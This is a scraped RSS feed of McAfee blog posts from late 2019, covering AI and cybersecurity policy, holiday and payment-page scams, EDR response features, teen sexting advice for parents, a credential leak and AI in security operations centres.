Much has been said about the power of AI and how tomorrow’s CISO won’t be able to provide efficient cybersecurity without it. The hype surrounding AI is based on both the quickening pace of natural language capability development and the current deficiency of capable and competent cybersecurity professionals. A quick clarification of what AI is […]

The post Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part I appeared first on McAfee Blogs.

]]>

Much has been said about the power of AI and how tomorrow’s CISO won’t be able to provide efficient cybersecurity without it.

The hype surrounding AI is based on both the quickening pace of natural language capability development and the current deficiency of capable and competent cybersecurity professionals.

A quick clarification of what AI is and to what extent it exists today may be useful before explaining the legal recognition it has today, including in the world of cybersecurity.

What is AI? Does it exist yet?

The term “artificial intelligence” is rather vague from a legal standpoint—and in the legal world, words tend to have a strong impact. For French people (and for most people around the world), the official definition of AI is as follows: “A theoretical and practical interdisciplinary field whose purpose is to understand the mechanisms of cognition and reflection, and their imitation by a material and software device, for purposes of assistance or substitution to human activities”.

AI now has full recognition of the EU Parliament as a result of the 2018/2088(INI) Motion on Comprehensive European Industrial Policy on Artificial Intelligence and Robotics, also known as the Ashley Fox Resolution, dated 12 February 2019 (Motion). Interestingly, this resolution specifically mentions the implications of AI for cybersecurity:

“Notes that cybersecurity is an important aspect of AI, especially given the challenges for transparency in high level AI; considers that the technological perspective, including auditing of the source code, and requirements for transparency and accountability should be complemented by an institutional approach dealing with the challenges of introducing AI developed in other countries into the EU single market “

So, with such official recognition, why do we read everywhere that real AI does not exist yet?

The argument made is that, although the goal is to replace the human being, AI may only provide augmented intelligence which assists the human being.

In fact, says J. McCarthy, as far back as the 1956 Dartmouth Artificial Intelligence Conference, the conference was “to proceed on the basis of the conjecture that every aspect of learning or any other feature of intelligence can in principle be so precisely described that a machine can be made to simulate it.”

More than 60 years later, machine learning is still not autonomous. But it does exist to a certain degree, and the capability of machine learning combined with the accumulation of today’s databases makes it possible to create algorithms capable of performing tasks that have never been automated before. AI, or at least a certain form of AI, is today part of our daily lives, and understanding this technology is essential so that it can be accepted and integrated into our societies.

In Part II of this blog, we’ll examine the economic, political and ethical challenges in the development of AI, particularly as they pertain to cybersecurity. 

The post Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part I appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-i/feed/ 1
How to Ensure You Don’t Fall Victim to a Holiday Scam this Festive Season https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-ensure-you-dont-fall-victim-to-a-holiday-scam-this-festive-season/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-ensure-you-dont-fall-victim-to-a-holiday-scam-this-festive-season/#respond Mon, 02 Dec 2019 01:56:15 +0000 /blogs/?p=97649

If Benjamin Franklin were alive today, I have no doubt that he’d revise his famous quote: ‘Nothing can be said to be certain except death and taxes’ to include online holiday scams! For there is no question that online scammers and cybercriminals love the festive season! The bulk of us are time-poor, stressed, and sporting […]

The post How to Ensure You Don’t Fall Victim to a Holiday Scam this Festive Season appeared first on McAfee Blogs.

]]>

If Benjamin Franklin were alive today, I have no doubt that he’d revise his famous quote: ‘Nothing can be said to be certain except death and taxes’ to include online holiday scams! For there is no question that online scammers and cybercriminals love the festive season! The bulk of us are time-poor, stressed, and sporting to-do lists as long as our arms – so cybercrims know it’s inevitable that some of us are going to take short cuts with our online safety and fall into their webs!

And McAfee research shows just that with over a third of Aussies having either fallen victim to or know someone who has been affected by a phishing scam in 2019. A phishing scam is when a scammer poses as a trustworthy entity (for example, a bank or government department) usually via email with the sole purpose of trying to extract sensitive information such as passwords, usernames and credit card details. And clearly, phishing is a very lucrative online trick as it was named as the worst scam of 2019!

Top Scams of 2019

Although phishing scams have taken out the top place for 2019, robocalling scams and shipping notification scams have also caused Aussies great pain this calendar year.

If you receive a phone call with a pre-recorded message that presents a grim scenario if you don’t take action then you’ve been robocalled! My family’s ‘favourite’ one from 2019 was the scam which delivered a pre-recorded message advising us that our phone line would be cut unless we spoke immediately to their technician. The Australian Telecommunications Ombudsman was overrun with complaints about this particular heist which backs up McAfee’s research that shows 32% of Aussies either fell victim to this scam, or knew someone who did.

Shipping notification scams have also caused Aussies grief this year with more than a 1/4 of us (26%) affected or in touch with someone who was. The meteoric rise of online shopping has meant that when many of us are notified about an impending delivery, we probably don’t stop to question its authenticity.

How Much Are Scams Costing Aussies?

In Australia, 1 in 10 scam victims (11%) have lost money as a result of being targeted by a scam. And a quarter of those affected have lost more than $500! Now, that’s a sizeable chunk of cash!

But in addition to an initial monetary sting, having your personal details ‘stolen’ via a scam may come back to haunt you later down the track. According to McAfee’s Advanced Threat Research (ATR), more than 2.2 billion stolen account credentials were made available on the criminal underground in just the first 3 months of 2019!

Cybercriminals Love the Holidays!

The holiday season is particularly stressful for consumers, and cybercriminals plan accordingly. Many of us ramp up our online shopping in the lead-up to the holiday period and, as our ‘to-do’ lists get longer, some of us will inevitably let our guard down online. And cybercriminals know this too well so consequently spend a lot of effort devising cunning schemes to take advantage of our corner-cutting.

Cybercriminals put a lot of effort into devising fake accounts and sites to target consumers around key holiday shopping periods however some Aussies aren’t aware of these ploys with 21% of the Aussies interviewed not aware scams like these existed.

How Can Consumers Stay Safe This Holiday Period?

I highly recommend that you (and your family members) take a little time this holiday period to sure up your online safety. Here are a few simple steps that consumers can take to protect themselves and avoid getting scammed this festive period:

  1. Think Before Clicking on Links

With phishing scams revealed to be the worst scam of the year, it is more important than ever to think before clicking on links. Instead of clicking on a link in an email, it is always best to check directly with the source to verify an offer or shipment.

  1. Passwords, Passwords, Passwords

With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts. By using a different password for each, shopping, media streaming or social media account, you can dramatically reduce this risk.

  1. Invest in Security Protection Software

Use comprehensive security protection, like McAfee Total Protection, which can help protect devices against malware, phishing attacks and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

  1. Consider a Virtual Private Network (VPN)

A solution like McAfee Safe Connect with bank-grade encryption, private browsing services, and internet security will keep your information safe from cybercriminals – even when checking emails or online shopping on public Wi-Fi or open networks.

And finally beware bogus gift card scams! One new trend that is set to hit unsavvy consumers hard this holiday season is phoney gift cards, with McAfee’s ATR team seeing fake gift cards sold on the cybercriminal underground. Yet, despite the rise in this scam, 17 per cent of the survey respondents have never heard of bogus gift cards and over a quarter (26%) reported that they are not concerned about the threat. So, please spread the word and do your homework before buying gift cards!

Here’s to a Happy, Scam-Free Holiday Season!

The post How to Ensure You Don’t Fall Victim to a Holiday Scam this Festive Season appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-ensure-you-dont-fall-victim-to-a-holiday-scam-this-festive-season/feed/ 0
7 Ways to Wreck a Cybercrook’s Holidays https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-wreck-a-cybercrooks-holidays/ https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-wreck-a-cybercrooks-holidays/#respond Sat, 30 Nov 2019 15:00:44 +0000 /blogs/?p=97635

’Tis the season for giving and who better to give a giant headache to than the digital scammers working overtime to wreck our holidays? Can we spot and unravel every scam out there? Probably not. But, by taking a few minutes to get equipped to click, we can dodge common traps laid by cybercrooks and […]

The post 7 Ways to Wreck a Cybercrook’s Holidays appeared first on McAfee Blogs.

]]>

holiday scams’Tis the season for giving and who better to give a giant headache to than the digital scammers working overtime to wreck our holidays? Can we spot and unravel every scam out there? Probably not. But, by taking a few minutes to get equipped to click, we can dodge common traps laid by cybercrooks and wreck their holidays before they get a chance to wreck ours.

Rock ‘Em Sock ‘Em Robo Calls

As informed as most of us may profess to be, American consumers continue to step into cyber traps every day. In fact, according to a recent McAfee survey, in 2019, 74% of those surveyed admitted to losing more than $100 in scams and almost a third (30%) losing more than $500. The survey also revealed that 48% of Americans have been or know someone who has been a victim of robocalling in 2019, making it the most prevalent scam of the year. Email phishing (41%) and text phishing (35%) are also tricks we fell for in 2019.

Cybercrooks call those stats a very happy holiday.

Are you equipped to click?

We can do our part to reduce these statistics. Before we all get distracted with shopping sprees or fall into sugar comas, call a family huddle. Discuss ways to avoid the digital traps and send cybercrooks into a maze of locked doors and dead ends. Here are a few ideas to get you started.

7 ways to wreck a cybercrook’s holidays

  1. Get real about cybercrime. Don’t sugar coat cybercrime for your kids. Here’s the truth: Over 2.2 billion stolen account credentials were made available on the cybercriminal underground throughout Q1 2019 alone, which puts a priceless amount of user data at risk. Crooks are targeting us. They are shopping the black web for stolen data to use in a variety of illegal ways. If we fail to lock our digital doors, the consequences can be emotionally and financially devastating and may last years.
  2. Shake up your passwords. Never use the same password. By uncovering one of your passwords,  cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts. So change passwords often and use a variety, especially around the holidays when online shopping spikes.
  3. Verify emails. Slow down to examine emails. Instead of clicking on an email link, check directly with the source to verify an offer or shipment. Cybercriminals are getting very sophisticated. They are creating full websites that closely mimic brand retailers. Also, they are posing as friends, family, and colleagues in an attempt to get you to click a link that will download malicious malware onto your computer.
  4. Browse securely. Use a comprehensive security solution to help protect devices against malware, phishing attacks, and malicious websites.
  5. Use a tool to help protect your personal information. Take a proactive approach to help protect identities with personal and financial monitoring and recovery tools to help your identity secure.
  6. Verify shipments. Cybercrooks understand consumer habits. They know you’ve likely ordered from several online retailers, so they will exploit that and try to confuse you by sending bogus shipment notifications or reward  you with “added offers.” The email will look legitimate. It will likely have a legitimate-looking email address and branding of the retailer or shipping company. Check directly with the source before clicking any link in an offer or shipment notification.
  7. Protect your identity. Criminals are on the prowl to find weak links anywhere personal data is kept — the includes credit card companies and banks. Get proactive in protecting your identity and the identities of your family members with personal and financial monitoring and recovery tools.

Even with the threats that exist around us, keep your sights fixed on the bigger picture. The holiday season is still merry and bright. People are still good. And, peace on earth — and in your home — is still possible this year. With a little foresight and a few cool tools, you are more than able to protect the things that matter most.

To stay informed on the latest digital news, trends, and family safety insights, subscribe to this and other McAfee blogs. Follow @McAfee_Family on Twitter to join the digital parenting conversation.

The post 7 Ways to Wreck a Cybercrook’s Holidays appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-wreck-a-cybercrooks-holidays/feed/ 0
Beat Black Friday Scammers: Secure Your Online Purchases From Fake Payment Processors https://www.mcafee.com/blogs/consumer/consumer-threat-notices/fake-payment-processors-scam/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/fake-payment-processors-scam/#respond Wed, 27 Nov 2019 16:52:19 +0000 /blogs/?p=97644

They see you when you’re shopping, they know when you click “pay” – cybercriminals, that is. With Black Friday and Cyber Monday deals flooding the internet, malicious actors have many opportunities to exploit users rushing to purchase gifts for family and friends. And according to Ars Technica, thieves have devised a new way to steal […]

The post Beat Black Friday Scammers: Secure Your Online Purchases From Fake Payment Processors appeared first on McAfee Blogs.

]]>

They see you when you’re shopping, they know when you click “pay” – cybercriminals, that is. With Black Friday and Cyber Monday deals flooding the internet, malicious actors have many opportunities to exploit users rushing to purchase gifts for family and friends. And according to Ars Technica, thieves have devised a new way to steal payment-card data from online shoppers, just in time for the holiday shopping season.

So, what makes this particular scam different from other credit and debit card scams? Many e-commerce sites will choose to offload payment card charges to third-party payment service platforms, or PSPs. However, cybercriminals have developed fake payment service platforms that highly resemble legitimate PSPs. Rather than infecting a merchant’s checkout page with malware that skims the information after it’s been inputted by the user, cybercriminals infect the merchant site by adding a line or two of code, which redirects the user to a fake PSP at the time of purchase.

Image provided by Ares Technica.

What makes this scam so stealthy? Apart from swapping legitimate payment processing sites with fraudulent ones, cybercriminals closely mimic the traits of real e-banking pages to further trick the user into believing that their purchase is secure. For example, the fake payment processing page checks all the fields once the user completes them or informs the user if the field is invalid. Once the fake PSP collects the data, it redirects the unsuspecting user to the legitimate PSP and includes the purchase amount after successfully stealing the victim’s information.

Payment-service platforms are common in the world of e-commerce, particularly for smaller websites that don’t have the resources to harden their servers against sophisticated attacks. As a result, users need to be on high alert for these malicious schemes. Check out the following tips to help prevent your data from being swiped by cybercriminals.

  • Be on the lookout for suspicious activity. This particular scam redirects users from the fake PSP back to the legitimate payment site after their information has already been accepted. If you’re being asked for personal or financial data more than once, the site has likely been infected with malicious code.
  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Use a comprehensive security solution. Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection, which can help protect you from malware, phishing, and other threats.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Beat Black Friday Scammers: Secure Your Online Purchases From Fake Payment Processors appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/fake-payment-processors-scam/feed/ 0
Response Required: Why Identifying Threats With Your EDR Isn’t Enough https://www.mcafee.com/blogs/enterprise/endpoint-security/response-required-why-identifying-threats-with-your-edr-isnt-enough/ https://www.mcafee.com/blogs/enterprise/endpoint-security/response-required-why-identifying-threats-with-your-edr-isnt-enough/#respond Mon, 25 Nov 2019 16:00:00 +0000 /blogs/?p=97584

The perpetrator was a master of disguise, outfitting himself as an employee to bypass the extensive preventive security controls and flee with the contents of the vault. Fortunately, the building was equipped with strong detection security measures, and the burglar—unaware of the location of a laser tripwire—soon set off a silent alarm. A handful of […]

The post Response Required: Why Identifying Threats With Your EDR Isn’t Enough appeared first on McAfee Blogs.

]]>

The perpetrator was a master of disguise, outfitting himself as an employee to bypass the extensive preventive security controls and flee with the contents of the vault. Fortunately, the building was equipped with strong detection security measures, and the burglar—unaware of the location of a laser tripwire—soon set off a silent alarm. A handful of the best-equipped and most experienced officers swarmed the building just minutes later, tracing the subject to a large storage area where they found him frantically digging through the large box of documents and cramming a few in his backpack.

While the other officers stood in the hallway at the ready, one began walking toward the perp, shouting “It’s all over, buddy. This is the end of the road.” The criminal, fear-stricken, turned to run. As he began to make his way toward a freight entrance, he was dumbfounded to hear only his own footsteps reverberating off the walls. He chanced a look back at the officer, who had not moved. “You thought you could run, but we found you! You’re under arrest!” the officer shouted, still not moving a muscle. Knowing something had to be going on, the criminal took this opportunity to hurriedly backtrack to the box and grab his ill-gotten loot. He looked back at the officer, who was still frozen in place.

The criminal looked incredulously at the officer, laughed and shook his head. Feeling no threat, he slowly shuffled out with his giant box of classified documents into the night.


The “R” Is There For A Reason

What is true in the world of police is also true in the world of cybersecurity: Detection means nothing without response. And not any response, but the right response.

EDR marketing materials focus heavily on their ability to detect the largest number of the newest threats in the least amount of time. But without a broad and well-developed set of response mechanisms in place, even the best detection abilities are of little use. Unlike, say, a legacy anti-virus product, EDR isn’t a “set it and forget it” technology—you can’t just put it on your network and call it a day. Your ability to adequately respond to threats is going to depend on two factors. While having capable analysts at the helm is vital, not limiting them with inadequate tools is an equally important part of safeguarding your enterprise.


Response Options Must Be Extensive

What if our officer instead had access to a full range of response capabilities? Criminals are unpredictable, and it’s impossible to know ahead of time whether “Put your hands up!” will be sufficient, or whether you’ll need to call for backup, use a stun gun or give chase. The ability to determine the best response isn’t enough if you don’t have access to that response method.

So it goes in cybersecurity. The EDR market is sharply divided in terms of response capabilities, and the ability—or inability—to adequately respond should be a purchasing consideration. Any decent EDR will yield the necessary context and present it in a way that allows you to easily and quickly assess the situation. A good EDR will put a panoply of response capabilities at your fingertips. Should you kill the process? Restart the machine? Quarantine the box? The amount of flexibility offered can affect how quickly you’re able to handle the threat.

Ideally, according to a SANS Institute report, your EDR should have at least the following response options:
– Terminate running processes
– Prevent processes from executing based on name, path, argument, parent, publisher or hash
– Block specific processes from communicating on the network,
– Block processes from communicating with specific host names or IP addresses
– Uninstall Services
– Edit registry keys and values
– Shut down or reboot an endpoint
– Log users off an endpoint
– Delete files and directories

But what do you do when the specific response you need isn’t available out of the box? In this case, you need to be able to program your own script to perform a custom action or response. Many EDRs lack the technology to make this possible, but it’s an important thing to look for—just because your business needs don’t require it now, doesn’t mean it won’t in the future.

 

EDR: Excessively Delayed Reaction?

What if our officer can chase a suspect, but only in baby steps? What if he or she can call for backup, but it takes them 45 minutes to arrive?

Having every response ever conceived still isn’t enough if they cannot contain threats in time.

With attackers moving from initial compromise to action on objectives with increasing quickness, the old way of “reassign the ticket to IT” no longer cuts it—by the time IT notices the ticket, the attacker may already have gone.

It’s important to have at your disposal the best response. But when you don’t yet know what something is, your best response may not be your first response. In other words, sometimes you’re going to want to be able to quarantine the affected device(s) while you investigate and scope in order to limit the threat’s impact.

The ability for the EDR to integrate with existing workflows, rather than dictating those workflows, can also make a big difference. A lot of people look at MTTD (Mean Time To Detection)—but that’s only part of the story. A better indicator of an EDR’s effectiveness is MTTR (Mean Time To Response). According to SANS Institute analyst Jake Williams, enterprises that have orchestrated actions between detection and response have MTTR metrics that are both more favorable and more reliable.

There’s no shortage of EDR solutions on the market, at all levels of speed and capability. It’s worth making sure that yours offers as much in terms of response as it does in detection—remember, when you choose an EDR, you’re partnering with the technology that will serve and protect your enterprise.  When the chips are down, are you going to have an EDR that can identify, track and eliminate a threat in time to prevent massive devastation?

In a future blog, we’ll explain how detection and response should work in parallel with prevention to safeguard your enterprise. 

 Want to learn more about what to look for—and watch out for—in an EDR? Click here to read “Why Traditional EDR Is Not Working—and What To Do About It.”

The post Response Required: Why Identifying Threats With Your EDR Isn’t Enough appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/endpoint-security/response-required-why-identifying-threats-with-your-edr-isnt-enough/feed/ 0
Could Your Child be Sexting? Signs to Look for and Ways to Respond https://www.mcafee.com/blogs/consumer/family-safety/could-your-child-be-sexting-signs-to-look-for-and-ways-to-respond/ https://www.mcafee.com/blogs/consumer/family-safety/could-your-child-be-sexting-signs-to-look-for-and-ways-to-respond/#respond Sat, 23 Nov 2019 15:00:04 +0000 /blogs/?p=97588 Teens and sexting

Oh, what we wouldn’t do to travel back in time to the days before smartphones kid-jacked our families, right? But here we are. Our kids are forever connected. And, it’s up to parents to help them navigate the risks — one of which is sexting. Ouch. Even reading the word may make any parent want […]

The post Could Your Child be Sexting? Signs to Look for and Ways to Respond appeared first on McAfee Blogs.

]]>
Teens and sexting

Oh, what we wouldn’t do to travel back in time to the days before smartphones kid-jacked our families, right? But here we are. Our kids are forever connected. And, it’s up to parents to help them navigate the risks — one of which is sexting.

Ouch. Even reading the word may make any parent want to click off this post and run. But don’t. Stay here. Keep reading. Yes, it’s a difficult thing to imagine that your child could be like those “other kids.” (You know, the unruly ones; the wild ones, the ones who must lack parental input and digital monitoring, right?)

But it happens. Good kids — great kids even — may bend the rules and eventually engage in sexting.

As one parent recently reminded with this Direct Message on Twitter:

“I recently discovered my daughter has been sexting with her boyfriend. I’m still shaking over what I found. This is not like her at all. The worst part is she blew it off like it was no big deal! She says everyone does it, and I’m overreacting. Am I the crazy one here? Do a lot of kids do this? Please help. No clue what to do next.” ~ Minnesota Mom

Teens and sextingSexting stats

For Minnesota Mom, and others, here’s what we know.

Some, but not all, kids sext.

One of the latest and most comprehensive studies reveals that while adolescent sexting isn’t an epidemic, it’s still happening despite public campaigns to reduce it. The study, published in the journal Archives of Sexual Behavior, Justin Patchin and Sameer Hinduja, surveyed 5,593 American middle and high school students ages 12 to 17.

In summary, the study found:

  • 14% of middle and high school students had received a sexually explicit image from a boyfriend or girlfriend
  • 6% said they received such an image from someone who was not a current romantic partner.
  • 11% reported sending a sext to a boyfriend or girlfriend.
  • 9% of the students who were asked by a current boyfriend or girlfriend to send a sext complied.
  • 43% of students asked to send a sext by someone who was not a current romantic partner complied.

No, mom, you aren’t crazy.

If you’ve discovered your child is sexting, don’t buy into the flippant (and erroneous) response that “everyone’s doing it.” For those kids who are engaged in sexting, your concerns are more than legitimate.

Sexting can carry enormous emotional, physical, social, and even legal risks. Also, if a situation gets out of hand (not often but it happens), those involved may never fully recover emotionally.

Some signs of sexting

  • Increased secrecy. If your daughter (or son) is sexting, they may become overly protective of their cell phone and hide their screen from public view. They may sleep with their phones under their pillows to safeguard its contents.
  • Grade changes. Grades may drop as risky behaviors edge out day to day responsibilities.
  • Friend changes. If you check your child’s social accounts and notice an increase in flirty photos and language or friends who do the same, it could be a sign of risky digital behavior.
  • Spike in screen time. You may notice your tween or teen on the phone more, leave the room to talk or text, and insist on using their phone from a private place.
  • Anger, defensiveness. While kids may try to rationalize or normalize sexting, your child knows sending a racy photo on a device is risky. Hiding that behavior can cause anger and defensiveness. Your child also likely knows about the specific risks associated with sexting — things like sextortion (pressuring, threatening), revenge porn (sharing to humiliate), bullying, a wrecked reputation, anxiety, and depression. However, she may be in denial that the consequences apply to her personally.

How to respond

Don’t lose your cool or shame. Today’s digital teen culture is something parents haven’t experienced. Peer pressure plays a significant role in sexting. Girls may sext to compete for and win someone’s approval, to prove loyalty or love, or as relational insurance. Boys can be bullied or shamed by male peers if they don’t have girls sexting them.

Keep in mind: What the teenage brain believes to be a good idea at 15 isn’t likely to align with that of a parent. Coming-of-age behaviors in the digital era do not look like they did decades ago. So getting angry, shaming, or getting extreme with restrictions, may not be as useful as working together to figure out why your child is sexting, why it isn’t wise, and how to avoid doing it in the future.

Act quickly. If you discover your child is sexting, immediately remove all suggestive images from your child’s phone and be aggressive to get them deleted from anyone else’s devices. Sexting will often end between the participants without incident. Other situations can escalate. Every situation will be different. Gather all facts and carefully consider bringing other people into the situation. State laws vary, and sexting allegations can have profound consequences. Some options may be to 1) talk to the other kids or parents involved 2) speak to the school (if relevant) 3) contact the police (if a situation evolves to conflict or threats) 4) pursue legal action (if related) 5) seek counseling if a situation causes anxiety or depression for your child.

Teach responsibility; consider filtering. Teaching digital responsibility is one of the top tasks of parents today. And, a healthy parent-child relationship is the best way to equip your child to deal with and avoid sexting. In addition to discussing the risks, but time limits, and phone curfews in place, and consider protecting your family devices with parental controls.

Be proactive. Sexting is a tough but necessary conversation. Start talking to your kids at a young age about the importance of protecting their privacy — information, images, reputation — online. Get specific about what kind of content is okay and not okay to share. Have age-appropriate conversations on how to avoid the temptation of sexting and possible consequences. This handbook from Common Sense Media is an excellent resource as you approach the sexting discussion.

Make the consequences clear. Work together to create ground rules for responsible phone use that include clear consequences. Be prepared to enforce those consequences. If you say you will take away a phone for a week that isn’t used responsibly, be prepared to do that (even if you have to endure not being able to communicate with your child throughout the school day).

Parenting in the digital age certainly isn’t for the faint of heart. Kids are always one poor choice away from an emotional avalanche. Find different ways to let your kids know you are there for them — without condition — to listen, to counsel, and to help them work through any difficult situation.

The post Could Your Child be Sexting? Signs to Look for and Ways to Respond appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/could-your-child-be-sexting-signs-to-look-for-and-ways-to-respond/feed/ 0
2.2 Million Users Affected By Latest Data Exposure: 4 Tips to Stay Secure https://www.mcafee.com/blogs/consumer/consumer-threat-notices/gatehub-epicbot-data-exposure/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/gatehub-epicbot-data-exposure/#respond Fri, 22 Nov 2019 17:11:56 +0000 /blogs/?p=97581

The digitalization of data allows it to move effortlessly and be accessed from devices and places around the world within a matter of seconds. This also makes it possible for businesses, organizations, and even individuals to collect and analyze this data for a variety of reasons. However, not all of these purposes are well-intentioned. More […]

The post 2.2 Million Users Affected By Latest Data Exposure: 4 Tips to Stay Secure appeared first on McAfee Blogs.

]]>

The digitalization of data allows it to move effortlessly and be accessed from devices and places around the world within a matter of seconds. This also makes it possible for businesses, organizations, and even individuals to collect and analyze this data for a variety of reasons. However, not all of these purposes are well-intentioned. More often than not, cybercriminals use the abundance of digital data to their advantage. According to Ars Technica and security researcher Troy Hunt, password data and other personal information belonging to as many as 2.2 million users of two websites – a cryptocurrency wallet service and a gaming bot provider — has been posted on the Dark Web.

What information is included in these databases? The first data haul includes personal information for as many as 1.4 million accounts from the GateHub cryptocurrency wallet service. The cybercriminal who posted this 3.72GB database stated that it also includes two-factor authentication keys, mnemonic phrases, and wallet hashes. The second haul contains data for about 800,000 accounts on RuneScape’s bot provider EpicBot, including usernames and IP addresses. Both databases include registered email addresses and hashed passwords.

So, what lessons can we learn from this data dump and what can we do to help secure our information? Check out the following security tips to help protect your digital data.

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords consistently to further protect your data.
  • Watch out for other cyberattacks. Be on high alert for other malicious attacks where cybercriminals could use stolen credentials to exploit users, such as spear phishing.
  • Check to see if you’ve been affected. If you or someone you know has a GateHub or EpicBot account, use this tool to check if you could have been potentially affected.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 2.2 Million Users Affected By Latest Data Exposure: 4 Tips to Stay Secure appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/gatehub-epicbot-data-exposure/feed/ 0
The AI (R)evolution: Why Humans Will Always Have a Place in the SOC https://www.mcafee.com/blogs/enterprise/the-ai-revolution-why-humans-will-always-have-a-place-in-the-soc/ https://www.mcafee.com/blogs/enterprise/the-ai-revolution-why-humans-will-always-have-a-place-in-the-soc/#respond Wed, 20 Nov 2019 16:00:30 +0000 https://securingtomorrow.mcafee.com/?p=97162

In cybersecurity, the combination of men, women and machines can do what neither can do alone — form a complementary team capable of upholding order and fighting the forces of evil. The 20th century was uniquely fascinated with the idea of artificial intelligence (AI). From friendly and helpful humanoid machines — think Rosie the Robot […]

The post The AI (R)evolution: Why Humans Will Always Have a Place in the SOC appeared first on McAfee Blogs.

]]>

In cybersecurity, the combination of men, women and machines can do what neither can do alone — form a complementary team capable of upholding order and fighting the forces of evil.

The 20th century was uniquely fascinated with the idea of artificial intelligence (AI). From friendly and helpful humanoid machines — think Rosie the Robot maid or C-3PO — to monolithic and menacing machines like HAL 9000 and the infrastructure of the Matrix, AI was a standard fixture in science fiction. Today, as we’ve entered the AI era in earnest, it’s become clear that our visions of AI were far more fantasy than prophecy. But what we did get right was AI’s potential to revolutionize the world around us — in the service of both good actors and bad.

Artificial intelligence has revolutionized just about every industry in which it’s been adopted, including healthcare, the stock markets, and, increasingly, cybersecurity, where it’s being used to both supplement human labor and strengthen defenses. Because of recent developments in machine learning, the tedious work that was once done by humans — sifting through seemingly endless amounts of data looking for threat indicators and anomalies — can now be automated. Modern AI’s ability to “understand” threats, risks, and relationships gives it the ability to filter out a substantial amount of the noise burdening cybersecurity departments and surface only the indicators most likely to be legitimate.

The benefits of this are twofold: Threats no longer slip through the cracks because of fatigue or boredom, and cybersecurity professionals are freed to do more mission-critical tasks, such as remediation. AI can also be used to increase visibility across the network. It can scan for phishing by simulating clicks on email links and analyzing word choice and grammar. It can monitor network communications for attempted installation of malware, command and control communications, and the presence of suspicious packets. And it’s helped transform virus detection from a solely signature-based system — which was complicated by issues with reaction time, efficiency, and storage requirements — to the era of behavioral analysis, which can detect signatureless malware, zero-day exploits, and previously unidentified threats.

But while the possibilities with AI seem endless, the idea that they could eliminate the role of humans in cybersecurity departments is about as farfetched as the idea of a phalanx of Baymaxes replacing the country’s doctors. While the end goal of AI is to simulate human functions such as problem-solving, learning, planning, and intuition, there will always be things that AI cannot handle (yet), as well as things AI should not handle. The first category includes things like creativity, which cannot be effectively taught or programmed, and thus will require the guiding hand of a human. Expecting AI to effectively and reliably determine the context of an attack may also be an insurmountable ask, at least in the short term, as is the idea that AI could create new solutions to security problems. In other words, while AI can certainly add speed and accuracy to tasks traditionally handled by humans, it is very poor at expanding the scope of such tasks.

There are also the tasks that humans currently excel at that AI could potentially perform someday. But these tasks are ones that humans will always have a sizable edge in, or are things AI shouldn’t be trusted with. This list includes compliance, independently forming policy, analyzing risks, or responding to cyberattacks. These are areas where we will always need people to serve as a check on AI systems’ judgment, check its work, and help guide its training.

There’s another reason humans will always have a place in the SOC: to stay ahead of cybercriminals who have begun using AI for their own nefarious ends. Unfortunately, any AI technology that can be used to help can also be used to harm, and over time AI will be every bit as big a boon for cybercriminals as it is for legitimate businesses.

Brute-force attacks, once on the wane due to more sophisticated password requirements, have received a giant boost in the form of AI. The technology combines databases of previously leaked passwords with publicly available social media information. So instead of trying to guess every conceivable password starting with, say, 111111, only educated guesses are made, with a startling degree of success.

The post The AI (R)evolution: Why Humans Will Always Have a Place in the SOC appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/the-ai-revolution-why-humans-will-always-have-a-place-in-the-soc/feed/ 0
Are Smart Padlocks Secure Enough to Protect Your Packages? https://www.mcafee.com/blogs/consumer/hackable/are-smart-padlocks-secure-enough-to-protect-your-packages/ https://www.mcafee.com/blogs/consumer/hackable/are-smart-padlocks-secure-enough-to-protect-your-packages/#respond Tue, 19 Nov 2019 18:40:34 +0000 /blogs/?p=97545

“Hackable?” host Geoff Siskind likes to shop online. A lot. What he doesn’t like is how often his packages are stolen from his front porch. Desperate for a solution, he’s intrigued by smart padlocks that promise to protect packages. But after five seasons of hosting “Hackable?” Geoff is skeptical that anything smart is also secure. […]

The post Are Smart Padlocks Secure Enough to Protect Your Packages? appeared first on McAfee Blogs.

]]>

“Hackable?” host Geoff Siskind likes to shop online. A lot. What he doesn’t like is how often his packages are stolen from his front porch. Desperate for a solution, he’s intrigued by smart padlocks that promise to protect packages. But after five seasons of hosting “Hackable?” Geoff is skeptical that anything smart is also secure.

